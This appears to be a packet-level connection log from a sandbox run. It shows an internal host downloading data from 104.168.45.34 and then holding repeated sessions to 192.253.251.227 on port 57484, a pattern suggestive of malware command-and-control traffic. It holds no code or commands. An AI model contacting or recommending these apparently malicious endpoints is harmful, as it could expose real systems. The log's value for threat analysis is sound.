Jul 26, 2024 13:02:49.051770926 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.051790953 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051822901 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051853895 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051858902 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.051884890 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051920891 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051951885 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.051974058 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.051974058 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.051983118 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052015066 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052046061 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052052975 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.052077055 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052109003 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052139997 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052141905 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.052170992 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052201986 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052210093 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.052233934 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052243948 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.052265882 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052299023 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052309036 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.052330017 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052361012 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052386045 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.052391052 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052433014 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052459002 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.052464962 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052519083 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052550077 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052562952 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.052582026 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052612066 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052650928 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.052650928 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052650928 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.052685976 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052716970 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052748919 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052779913 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052809000 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.052812099 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052844048 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052875042 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052906036 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052911997 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.052911997 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.052937031 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.052969933 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.053061962 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.139739037 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.139784098 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.139816046 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.139848948 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.139879942 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.139884949 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.139884949 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.139913082 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.139945984 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.139981985 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.139981985 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.140033007 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.140064955 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.140079975 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.140098095 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.140130043 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.140146017 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.140162945 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.140196085 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.140228033 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.140259981 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.140290976 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.140300989 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.140300989 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.140322924 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.140353918 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.140384912 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.140396118 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.140415907 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.140450001 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.140512943 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.140822887 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.140855074 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.140886068 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.140917063 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.140948057 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.140979052 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.140983105 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.141015053 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.141026020 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.141046047 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.141077995 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.141109943 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.141141891 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.141172886 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.141182899 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.141182899 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.141205072 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.141237020 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.141268969 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.141300917 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.141326904 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.141711950 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.141745090 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.141778946 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.141793966 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.141825914 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.141832113 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.141858101 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.141891003 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.141895056 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.141921997 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.141954899 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.141954899 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.141988039 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.142020941 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.142052889 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.142071009 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.142085075 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.142098904 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.142117977 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.142149925 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.142180920 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.142187119 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.142213106 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.142241001 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.142271996 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.142297029 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.142611980 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.142743111 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.142776012 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.142807961 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.142832041 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.142839909 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.142872095 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.142880917 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.142904043 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.142935991 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.142963886 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.142967939 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.142999887 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.143001080 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.143030882 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.143063068 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.143095016 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.143110037 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.143126965 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.143143892 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.143158913 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.143191099 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.143239975 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.143315077 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.143564939 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.143599987 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.143631935 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.143687010 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.143737078 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.143758059 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.143769026 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.143800974 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.143832922 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.143865108 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.143871069 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.143891096 CEST	443	49182	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:49.143897057 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.143930912 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.143963099 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.143964052 CEST	49182	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:49.143995047 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.144007921 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.144026995 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.144058943 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.144062042 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.144090891 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.144124985 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.144134045 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.144157887 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.144212008 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.144313097 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.144603968 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.144659996 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.144691944 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.144725084 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.144731998 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.144756079 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.144788980 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.144819975 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.144850969 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.144879103 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.144882917 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.144902945 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.144915104 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.144947052 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.144979954 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.145066977 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.149157047 CEST	49182	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:49.149193048 CEST	443	49182	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:49.149560928 CEST	443	49182	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:49.150389910 CEST	49182	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:49.183605909 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.183690071 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.183811903 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.183839083 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.183856010 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.183877945 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.183959007 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.183973074 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.183989048 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.184005976 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.184238911 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.192521095 CEST	443	49182	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:49.222265959 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.222287893 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.222304106 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.222325087 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.222671986 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.222696066 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.222711086 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.222712040 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.222727060 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.222742081 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.222755909 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.222769022 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.222773075 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.222784996 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.222814083 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.222814083 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.222837925 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.222852945 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.222867966 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.222882986 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.222918987 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.222918987 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.223134995 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.223150015 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.223164082 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.223179102 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.223192930 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.223197937 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.223206997 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.223222017 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.223236084 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.223241091 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.223241091 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.223252058 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.223289013 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.223539114 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.223552942 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.223579884 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.223779917 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.223794937 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.223809958 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.223824024 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.223836899 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.223836899 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.223839045 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.223853111 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.223869085 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.223884106 CEST	80	49181	104.168.45.34	192.168.2.22
Jul 26, 2024 13:02:49.223912001 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.224003077 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:49.287952900 CEST	443	49182	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:49.288019896 CEST	443	49182	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:49.288264036 CEST	49182	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:49.288431883 CEST	49182	443	192.168.2.22	188.114.97.3
Jul 26, 2024 13:02:49.288453102 CEST	443	49182	188.114.97.3	192.168.2.22
Jul 26, 2024 13:02:49.334527969 CEST	49177	80	192.168.2.22	198.46.176.133
Jul 26, 2024 13:02:49.334767103 CEST	49181	80	192.168.2.22	104.168.45.34
Jul 26, 2024 13:02:52.132149935 CEST	49183	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:52.136970043 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:52.137032986 CEST	49183	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:52.137398005 CEST	49183	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:52.142210007 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:53.848289013 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:53.849514961 CEST	49183	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:53.856101990 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:54.382342100 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:54.389875889 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:54.394819021 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:54.397763014 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:54.404540062 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:54.411329031 CEST	49185	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:54.417701960 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:54.417733908 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:54.417973995 CEST	49185	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:54.417996883 CEST	49185	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:54.422868967 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:54.469938993 CEST	49186	80	192.168.2.22	178.237.33.50
Jul 26, 2024 13:02:54.476562023 CEST	80	49186	178.237.33.50	192.168.2.22
Jul 26, 2024 13:02:54.476618052 CEST	49186	80	192.168.2.22	178.237.33.50
Jul 26, 2024 13:02:54.476757050 CEST	49186	80	192.168.2.22	178.237.33.50
Jul 26, 2024 13:02:54.483910084 CEST	80	49186	178.237.33.50	192.168.2.22
Jul 26, 2024 13:02:54.591917038 CEST	49183	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:55.649920940 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:55.651264906 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:55.651330948 CEST	49183	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:55.651582003 CEST	80	49186	178.237.33.50	192.168.2.22
Jul 26, 2024 13:02:55.651607037 CEST	49183	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:55.651787996 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:55.651849031 CEST	49183	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:55.651849985 CEST	49186	80	192.168.2.22	178.237.33.50
Jul 26, 2024 13:02:55.651897907 CEST	80	49186	178.237.33.50	192.168.2.22
Jul 26, 2024 13:02:55.652178049 CEST	80	49186	178.237.33.50	192.168.2.22
Jul 26, 2024 13:02:55.652776003 CEST	49186	80	192.168.2.22	178.237.33.50
Jul 26, 2024 13:02:55.653002977 CEST	49186	80	192.168.2.22	178.237.33.50
Jul 26, 2024 13:02:55.664499998 CEST	49183	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:55.669459105 CEST	57484	49183	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:55.826459885 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:55.826550007 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:55.826581001 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:55.826632023 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:55.826653004 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:55.826668978 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:55.826697111 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:55.826715946 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:55.862381935 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:55.862416029 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:55.862430096 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:55.862443924 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:55.862473965 CEST	49185	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:55.862473965 CEST	49185	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:55.862528086 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:55.862540960 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:55.862580061 CEST	49185	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.027005911 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.109291077 CEST	80	49186	178.237.33.50	192.168.2.22
Jul 26, 2024 13:02:56.109354019 CEST	49186	80	192.168.2.22	178.237.33.50
